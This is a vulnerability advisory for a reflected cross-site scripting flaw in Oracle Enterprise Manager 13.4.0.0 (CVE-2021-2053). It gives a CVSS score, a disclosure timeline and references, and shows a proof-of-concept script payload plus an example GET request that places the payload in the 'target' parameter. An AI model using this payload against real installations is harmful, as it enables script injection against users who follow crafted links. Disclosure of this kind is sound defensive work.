Research & Development
$ cat#

CVE-2021-2053

Reflected Cross-Site Scripting in "target" query parameter

6.1 (Medium)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Oracle Enterprise Manager

13.4.0.0

Jakub Sajniak and Artur Obuchowski

Reflected Cross-Site Scripting vulnerability exists in

target
target GET parameter of the OEM 13.4.0.0 version. A specially crafted URL can trigger XSS attack. Successful attack requires victim interaction (clicking on the malicious link) and can result in modifying or exfiltrating data from the affected application.

In order to exploit the vulnerability you have to append

target
target parameter to URL with the following payload:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
</script><script>alert(document.domain)</script>
</script><script>alert(document.domain)</script>
</script><script>alert(document.domain)</script>

Conducted tests showed that multiple endpoints process

target
target parameter.
Example request:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain&target=%2FEMGC_GCDomain%2FGCDomain%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&[...REDACTED...] HTTP/1.1
GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain&target=%2FEMGC_GCDomain%2FGCDomain%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&[...REDACTED...] HTTP/1.1
GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain&target=%2FEMGC_GCDomain%2FGCDomain%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&[...REDACTED...] HTTP/1.1
  • 24-09-2020 - Vulnerability reported to vendor
  • 25-09-2020 - Vendor response
  • 25-10-2020 - Vendor update
  • 24-02-2021 - Issue addressed
  • 24-04-2021 - Vendor disclosure
  • 26-04-2021 - Public disclosure

https://www.oracle.com/security-alerts/cpuapr2021.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-2053